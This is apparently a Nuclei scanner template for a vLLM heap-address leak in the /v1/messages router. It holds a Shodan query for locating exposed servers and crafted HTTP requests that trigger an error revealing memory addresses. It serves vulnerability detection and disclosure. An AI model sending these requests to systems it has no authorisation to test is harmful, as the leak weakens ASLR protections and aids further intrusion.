id: CVE-2026-54236 info: name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak author: kenlacroix severity: medium description: | vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly. impact: | Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution. remediation: | Update to vllm version to latest. reference: - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw - https://github.com/vllm-project/vllm/pull/45119 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2026-54236 epss-score: 0.00796 epss-percentile: 0.52296 cwe-id: CWE-532 metadata: verified: true max-request: 2 vendor: vllm product: vllm shodan-query: http.html:"/v1/models" http.html:"vllm" tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive flow: http(1) && http(2) http: - raw: - | GET /v1/models HTTP/1.1 Host: {{Hostname}} Accept: application/json matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "\"id\":")' condition: and internal: true extractors: - type: regex name: model part: body internal: true group: 1 regex: - '"id"\s*:\s*"([^"]+)"' - raw: - | POST /v1/messages HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]} matchers: - type: dsl dsl: - 'status_code == 500' - 'contains_all(body, "_io.BytesIO object at 0x", "internal_error")' condition: and # digest: 4b0a0048304602210081097433bf757b3da6aff41ddfc3b1d3495999f4f4b99ec354120a9fdb163fce022100bc6e35b19be24a707be9293b86ae6eacea3bf139108f6fdfbcefb140aefa3a77:922c64590222798bb761d5b6d8e72950